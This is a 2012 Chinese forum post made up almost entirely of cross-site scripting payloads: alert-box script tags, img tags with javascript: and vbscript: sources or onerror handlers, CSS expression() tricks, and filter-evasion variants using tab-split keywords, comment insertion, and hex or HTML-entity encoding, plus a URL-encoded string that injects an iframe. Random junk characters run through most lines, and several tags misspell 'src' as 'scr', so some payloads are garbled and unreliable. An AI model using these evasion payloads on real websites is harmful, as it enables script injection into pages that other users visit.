<script>alert("跨站")</script> (最常用)
* \1 ?/ b- K4 f L, k' H Z' B: e# c<img scr=javascript:alert("跨站")></img>
8 o! G; F8 l+ b. X8 L3 x: y1 G<img scr="javascript: alert(/跨站/)></img>" D n: z. L1 j( {/ k
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)2 ?% I5 @% U% ^' C4 S
<img scr="#" onerror=alert(/跨站/)></img>
# x( J6 b1 `9 D2 ?( b8 }& ~<img scr="#" style="xss:expression(alert(/xss/));"></img>
% [) ~- @3 t2 h+ u<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)# y9 W% g& g# \
<img src=vbscript:msgbox ("xss")></img>% d9 f5 H2 Z1 D
<style> input {left:expression (alert('xss'))}</style>$ {: a+ `* }/ u2 d' \6 }
<div style={left:expression (alert('xss'))}></div>
/ Y7 F2 j5 s- ?- |% I0 R5 q<div style={left:exp/* */ression (alert('xss'))}></div>$ C' ]6 B9 H4 [5 _: G: `8 h
<div style={left:\0065\0078ression (alert('xss'))}></div>( p: a# o4 k9 Y8 b6 j
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
9 C( m& h( Z; B$ S6 M$ @7 Hunicode <div style="{left:expRessioN (alert('xss'))}">
+ |! z* o9 ~5 A2 E1 v* J& D. W. V
$ e9 F+ }/ U; r; }: z4 [% K2 |"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["2 M8 k* e8 i5 n) a& n4 A
|
发表于 2012-9-13 17:15:04
收藏
支持
反对